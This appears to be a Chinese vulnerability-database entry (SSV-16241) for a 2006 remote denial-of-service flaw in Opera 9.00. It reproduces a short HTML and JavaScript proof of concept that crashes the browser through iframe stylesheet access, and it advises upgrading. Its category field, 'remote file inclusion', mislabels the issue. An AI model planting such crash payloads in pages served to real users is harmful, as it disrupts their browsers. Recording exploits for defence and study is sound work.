Opera Web Browser 9.00 (iframe) Remote Denial of Service Exploit

基本字段

漏洞编号:
SSV-16241
披露/发现时间:
未知
提交时间:
2006-07-01
漏洞等级:
漏洞类别:
远程文件包含
影响组件:
Opera
漏洞作者:
未知
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0.25KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<!-- Opera 9 DOS exploit, discovered by
Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id)
http://y3d1ps.blogspot.com
//-->
<html>
<iframe src="palsu.php" name="fake" ></iframe>
<script type="text/javascript">
function mystyle() {
if (fake.document.styleSheets.length == 1 )
{
f = document.forms["basicstyle"].elements;
for (j = 0; j < f.length; j++)
{
if (f[j].name == 'fsmain');
}
}
}
mystyle();
</script>
</html>
<!-- live exploit :
http://y3dips.echo.or.id/opera9-dos/
//-->
# milw0rm.com [2006-07-01]
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

共 3 兑换

参考链接

解决方案

临时解决方案

官方解决方案

升级到最新无漏洞版本

防护方案

人气 1195
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负